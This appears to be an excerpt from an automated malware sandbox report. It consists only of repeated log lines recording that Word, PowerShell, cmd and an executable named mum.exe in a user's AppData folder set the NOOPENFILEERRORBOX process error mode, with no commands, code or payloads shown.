          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\mum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
